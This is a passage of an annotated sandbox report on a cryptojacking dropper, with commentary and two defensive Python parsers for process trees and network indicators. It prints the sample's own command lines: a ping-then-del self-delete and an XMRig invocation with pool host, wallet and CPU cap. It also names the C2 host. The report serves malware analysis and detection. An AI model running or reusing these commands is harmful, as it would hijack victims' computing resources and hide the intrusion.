File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jinfo.exe C:\Windows\TEMP\aEHvt.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

These ZoneMap and Cache\...\CachePrefix values under \REGISTRY\USER\.DEFAULT are written by WinINet when it initialises for an account with no loaded user profile, which is what a SYSTEM process gets. They corroborate the SYSTEM context of the C:\Windows\TEMP copy of aEHvt.exe and carry no signal by themselves.

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\TEMP\aEHvt.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\TEMP\aEHvt.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\TEMP\aEHvt.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\TEMP\aEHvt.exe N/A

Runs ping.exe

ping -n 5 127.0.0.1 is used as a delay of roughly four seconds before del removes the original dropper (full command line under Processes), so the file is gone by the time its process has exited. A cmd.exe command line that pings 127.0.0.1 and chains it with del is a reliable detection for this self-delete idiom.

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A
N/A N/A C:\ProgramData\National\National.exe N/A

Suspicious use of AdjustPrivilegeToken

SeLockMemoryPrivilege, requested by Nationa.exe, is the privilege XMRig enables to back its scratchpad with large pages; an ordinary user-mode process asking for it is rare and a good hunting pivot. SeIncBasePriorityPrivilege is requested by the dropper itself.

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\National\Nationa.exe N/A

Suspicious use of WriteProcessMemory

The repeated entries for each pair are the writes a parent performs while setting up a child it has just created; every target below is a freshly spawned process that appears under Processes, so nothing here indicates injection into an existing process. The value of the table is the parent/child map: 3436 (dropper) spawns 1256 and 3884, 3884 spawns 3464, 1256 spawns 1808; 4044 (National.exe) spawns 3296 and 4980, 3296 spawns 844.

Description Indicator Process Target
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4044 wrote to memory of 4980 N/A C:\ProgramData\National\National.exe C:\ProgramData\Microsoft\National\Nationa.exe
PID 4044 wrote to memory of 4980 N/A C:\ProgramData\National\National.exe C:\ProgramData\Microsoft\National\Nationa.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe

Processes

The list below is the Processes section arranged by parent, with the PIDs taken from the WriteProcessMemory table. Assigning the two batch-file launches to PIDs 1808 and 844 is an inference from where each .bat sits (the two 2d0470f9.bat files are in the same directories as the two aEHvt.exe copies); the report does not record what started National.exe (PID 4044), whose branch shows the SYSTEM-level artefacts noted under the System32 drops. National.exe is byte-identical to the submitted sample (same hashes under Files); Nationa.exe, one letter shorter, is a different file and is the XMRig binary.

[3436] C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"
  [1256] C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
      C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
    [1808] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2d0470f9.bat" "
  [3884] C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\564651~1.EXE > nul
    [3464] C:\Windows\SysWOW64\PING.EXE
        ping -n 5 127.0.0.1
[4044] C:\ProgramData\National\National.exe
    C:\ProgramData\National\National.exe
  [3296] C:\Windows\TEMP\aEHvt.exe
      C:\Windows\TEMP\aEHvt.exe
    [844] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\2d0470f9.bat" "
  [4980] C:\ProgramData\Microsoft\National\Nationa.exe
      C:\ProgramData\Microsoft\National\Nationa.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u 48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80

The miner command line is standard XMRig syntax: -o is the pool URL (stratum over plain TCP on port 80, chosen to pass as web traffic), -u the payee, a 95-character Monero address and the most durable indicator in this report, -p x a placeholder password, -k stratum keepalive, and --max-cpu-usage=80 caps CPU use so the host stays usable and the miner less conspicuous.
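An added example, not part of the sandbox report or its tooling: it rebuilds the behavioral2 process tree from the parent/child rows of the WriteProcessMemory table, then runs two checks over the recorded command lines, one for the ping-then-del self-delete idiom and one that pulls pool and wallet indicators out of an XMRig-style command line. The rows and command lines are copied from this report; assigning the two .bat launches to PIDs 844 and 1808 is an assumption (matched by the batch file's directory), and the Monero address sanity check (length 95 or 106, leading 4 or 8, base58 alphabet) is the author's own and goes beyond what the report shows.

```python
"""Process tree and command-line IOCs for behavioral2 (added example, not report tooling)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Rows copied from the report's WriteProcessMemory table (one duplicate kept to show dedup).
WPM_ROWS = r"""
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 3436 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
PID 4044 wrote to memory of 3296 N/A C:\ProgramData\National\National.exe C:\Windows\TEMP\aEHvt.exe
PID 3436 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4044 wrote to memory of 4980 N/A C:\ProgramData\National\National.exe C:\ProgramData\Microsoft\National\Nationa.exe
PID 3296 wrote to memory of 844 N/A C:\Windows\TEMP\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\aEHvt.exe C:\Windows\SysWOW64\cmd.exe
"""

# Command lines from the Processes section. Assigning the two .bat launches to
# PIDs 844 and 1808 is an assumption (matched by the batch file's directory).
CMDLINES = {
    3436: r'"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"',
    1256: r"C:\Users\Admin\AppData\Local\Temp\aEHvt.exe",
    4044: r"C:\ProgramData\National\National.exe",
    3296: r"C:\Windows\TEMP\aEHvt.exe",
    3884: r"C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\564651~1.EXE > nul",
    3464: "ping -n 5 127.0.0.1",
    4980: r"C:\ProgramData\Microsoft\National\Nationa.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u "
          "48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80",
    844: r'C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\2d0470f9.bat" "',
    1808: r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2d0470f9.bat" "',
}

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
# cmd.exe idiom: ping loopback N times as a sleep, then delete a file (usually the dropper itself).
SELF_DELETE_RE = re.compile(r"ping\s+-n\s+\d+\s+127\.0\.0\.1\s*&+\s*del\s+(?:/[a-z]+\s+)*(\S+)", re.I)
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

def parse_wpm(text):
    """{child: parent} and {pid: image path}; repeated rows collapse to a single edge."""
    parent_of, image = {}, {}
    for m in (ROW_RE.match(line.strip()) for line in text.strip().splitlines()):
        if m:
            parent_of[int(m[2])] = int(m[1])
            image.setdefault(int(m[1]), m[3])
            image.setdefault(int(m[2]), m[4])
    return parent_of, image

def render_tree(parent_of, image, cmdlines):
    """Indented text tree; roots are PIDs the table never shows being spawned."""
    children = defaultdict(list)
    for child, parent in parent_of.items():
        children[parent].append(child)
    lines = []
    def walk(pid, depth):
        lines.append("  " * depth + f"[{pid}] {image[pid]}")
        lines.append("  " * depth + "    " + cmdlines.get(pid, "(command line not recorded)"))
        for child in sorted(children[pid]):
            walk(child, depth + 1)
    for root in sorted(p for p in image if p not in parent_of):
        walk(root, 0)
    return lines

def self_delete_target(cmdline):
    """Path removed by the ping-then-del idiom, or None if the line is not one."""
    m = SELF_DELETE_RE.search(cmdline)
    return m[1].strip('"') if m else None

def looks_like_monero_address(addr):
    """Standard (95) or integrated (106) address, leading 4 or 8, base58 alphabet only."""
    return len(addr) in (95, 106) and addr[0] in "48" and set(addr) <= BASE58

def parse_xmrig_cmdline(cmdline):
    """Pool and wallet IOCs from an XMRig-style command line, or None if it is not one."""
    toks = cmdline.split()
    info = {"pool_url": None, "wallet": None, "password": None, "keepalive": False, "max_cpu_usage": None}
    named = {"-o": "pool_url", "--url": "pool_url", "-u": "wallet", "--user": "wallet", "-p": "password", "--pass": "password"}
    for i, tok in enumerate(toks):
        if tok in named and i + 1 < len(toks):
            info[named[tok]] = toks[i + 1]
        elif tok in ("-k", "--keepalive"):
            info["keepalive"] = True
        elif tok.startswith("--max-cpu-usage="):
            info["max_cpu_usage"] = int(tok.split("=", 1)[1])
    if not (info["pool_url"] or "").startswith("stratum"):
        return None
    u = urlsplit(info["pool_url"])
    info.update(scheme=u.scheme, pool_host=u.hostname, pool_port=u.port,
                wallet_plausible=looks_like_monero_address(info["wallet"] or ""))
    return info

if __name__ == "__main__":
    parent_of, image = parse_wpm(WPM_ROWS)
    print("\n".join(render_tree(parent_of, image, CMDLINES)))
    for pid, cl in CMDLINES.items():
        if (target := self_delete_target(cl)):
            print(f"[{pid}] self-delete of {target}")
        if (miner := parse_xmrig_cmdline(cl)):
            print(f"[{pid}] miner -> {miner['pool_host']}:{miner['pool_port']}, wallet plausible: {miner['wallet_plausible']}")
```

Running it prints the nine-process tree with 3436 and 4044 as roots, flags PID 3884 as deleting C:\Users\Admin\AppData\Local\Temp\564651~1.EXE, and reports PID 4980 as a miner pointed at xmr.crypto-pool.fr:80 with a plausible wallet. The same two checks applied to EDR process-creation telemetry give a detection for the self-delete idiom and a parser that turns any XMRig command line into blockable pool and wallet indicators.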

Network

Reading the table: the sample's own traffic is (a) ddos.dnsnb8.net, resolved once and then contacted ten times over TCP on 44.221.84.105:799, a non-standard port and the only non-Microsoft peer, which makes it the C2/download host; and (b) 28 separate DNS queries for the mining pool xmr.crypto-pool.fr with no TCP session following any of them, so the miner never reached a pool during this detonation (the name evidently did not resolve to anything it could use). The bing.com and bing.net sessions and the in-addr.arpa reverse lookups (mostly Microsoft address space, plus the C2 address) are background activity of the Windows 10 image. Actionable: block ddos.dnsnb8.net and 44.221.84.105:799, alert on outbound 799/tcp, and watch for repeated lookups of xmr.crypto-pool.fr.

Country Destination Domain Proto
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp
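An added example, not part of the report: a small pass over rows in this table's format that separates DNS lookups from TCP sessions and derives the three things an analyst wants from a sandbox capture, the non-noise TCP peers (candidate C2), peers on ports that do not blend in, and names the sample kept resolving without ever connecting (dead or unreachable infrastructure, still worth blocking because the sample retries). The rows are a constructed subset of this report's table; the list of sandbox-noise suffixes and the set of "common" TCP ports are assumptions to tune per environment.

```python
"""Who the sample looked up versus who it actually talked to (added example, not report tooling)."""
import re
from collections import Counter, defaultdict

# A constructed subset of the report's Network table, same column order:
# country, destination ip:port, domain, protocol.
NETWORK_ROWS = """
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
US 8.8.8.8:53 xmr.crypto-pool.fr udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

ROW_RE = re.compile(r"^(\S+) (\S+):(\d+) (\S+) (tcp|udp)$")
# Ports a C2 could plausibly blend into; anything else on TCP gets called out (assumption).
COMMON_TCP_PORTS = {80, 443, 8080, 8443, 25, 587, 993, 995, 22}
# Suffixes the Windows 10 sandbox image talks to on its own (assumption for this report).
SANDBOX_NOISE = (".bing.com", ".bing.net", ".microsoft.com", ".windows.com", ".in-addr.arpa")

def parse_rows(text):
    """Parse 'country ip:port domain proto' rows; malformed lines are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"country": m[1], "ip": m[2], "port": int(m[3]), "domain": m[4], "proto": m[5]})
    return rows

def is_noise(domain):
    return domain.endswith(SANDBOX_NOISE)

def summarize(rows):
    """Split DNS lookups from TCP sessions and derive the facts an analyst wants."""
    dns_queries = Counter()
    sessions = defaultdict(Counter)  # domain -> (ip, port) -> number of sessions
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            dns_queries[r["domain"]] += 1
        elif r["proto"] == "tcp":
            sessions[r["domain"]][(r["ip"], r["port"])] += 1
    # Resolved repeatedly but never followed by a session: dead or unreachable infrastructure.
    queried_never_connected = sorted(d for d in dns_queries if d not in sessions and not is_noise(d))
    # Every non-noise TCP peer is a candidate C2 / download host.
    c2_candidates = sorted((d, ip, port, n) for d, peers in sessions.items() if not is_noise(d)
                           for (ip, port), n in peers.items())
    nonstandard = [c for c in c2_candidates if c[2] not in COMMON_TCP_PORTS]
    return {"dns_queries": dns_queries, "sessions": sessions,
            "queried_never_connected": queried_never_connected,
            "c2_candidates": c2_candidates, "nonstandard_port_peers": nonstandard}

def iocs(summary):
    """Block-list material: domains and ip:port pairs, in a stable order."""
    domains = set(summary["queried_never_connected"]) | {c[0] for c in summary["c2_candidates"]}
    peers = {f"{ip}:{port}" for _, ip, port, _ in summary["c2_candidates"]}
    return sorted(domains), sorted(peers)

if __name__ == "__main__":
    s = summarize(parse_rows(NETWORK_ROWS))
    for d, ip, port, n in s["c2_candidates"]:
        odd = ", non-standard port" if port not in COMMON_TCP_PORTS else ""
        print(f"{d} -> {ip}:{port} ({n} sessions{odd})")
    for d in s["queried_never_connected"]:
        print(f"{d}: {s['dns_queries'][d]} lookups, no session")
    print(iocs(s))
```

On the constructed rows this reports ddos.dnsnb8.net on 44.221.84.105:799 as the one real peer (flagged for its port) and xmr.crypto-pool.fr as resolved four times with no session, which is the same picture the full table gives.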

Files

Points to take from the hashes: C:\ProgramData\National\National.exe has the same MD5 and SHA256 as the submitted sample, so it is a straight copy of the dropper placed under ProgramData; C:\ProgramData\Microsoft\National\Nationa.exe is a different file (the XMRig binary, see its command line under Processes) with a near-identical name. The digests of k1[1].rar are those of the four-byte text "foo" followed by a newline (MD5 d3b07384d113edec49eaa6238ad5ff00, SHA256 b5bb9d80...), so the server answered the download with a placeholder and the k1..k5 second-stage files were not obtained in this run; a later detonation may fetch something else. C:\Windows\Temp\5EA418CE.exe is written but never appears in the process list. The memory/<pid>-<n>-<range>-memory.dmp entries are the sandbox's dumps of the named process's memory regions (3436 and 4044 are the two copies of the dropper, 1256 and 3296 the two aEHvt.exe instances), not files the sample wrote.

memory/3436-0-0x0000000000670000-0x0000000000795000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/1256-5-0x00000000002C0000-0x00000000002C9000-memory.dmp

C:\ProgramData\National\National.exe

MD5 5646516f9069627c54a3878c3af85286
SHA1 ae5b07a58f1e1d148d76b4241dfedddab6def8cc
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9
SHA512 d0942c255d0f0b525d83c2ac903f0f078667bfb71bd6524d1859892598e11c1ed673e694bf07e4bbcae31e1910f30be4d15213e67005fb36e5a9fcf92a6a36cf

memory/3296-14-0x0000000000850000-0x0000000000859000-memory.dmp

memory/4044-13-0x0000000000600000-0x0000000000725000-memory.dmp

C:\Program Files\7-Zip\Uninstall.exe

MD5 aaf69cfb9033627f1c108749c1c307a5
SHA1 d83d98268ee10ae8713cd1954a7c96a77ee4f188
SHA256 c1205c5d86b4e805a01751dec4004f2316eba90fee0967f3760525fbd1ac7cb3
SHA512 e93ba29d88999459e29d90e1552ccd82152e7164bff1cb068edc8bb27fcdc5f257ebac7dc84f176d93ae36b507f07e54f540b329b2334c5ae7507e4758e2660f

memory/3436-17-0x0000000000670000-0x0000000000795000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k1[1].rar

MD5 d3b07384d113edec49eaa6238ad5ff00
SHA1 f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

C:\Windows\Temp\5EA418CE.exe

MD5 20879c987e2f9a916e578386d499f629
SHA1 c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512 bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

C:\ProgramData\Microsoft\National\Nationa.exe

MD5 3fe786058a5e426c151ac71566f504ae
SHA1 76a8fe2f276a8fe174559fe24250093adb8619db
SHA256 77255adc0910dc376f87f4db05849dc8a20c9e87ab181cf2ff513fc718c869bd
SHA512 5e387b659c007ac8179375c9b2ce35b8413100394ebb3773962a33e1ac9de228b128d713417aa1138b3cbef5f3a5b79a6b11f888495519bbe46bddac78ed1a7c

memory/3296-100-0x0000000000850000-0x0000000000859000-memory.dmp

memory/1256-103-0x00000000002C0000-0x00000000002C9000-memory.dmp

C:\Windows\TEMP\2d0470f9.bat

MD5 a64c50da2c84ee68f634a86ce8e65a37
SHA1 a41d79d5174df26ddede9a9bcd0d5d631d037849
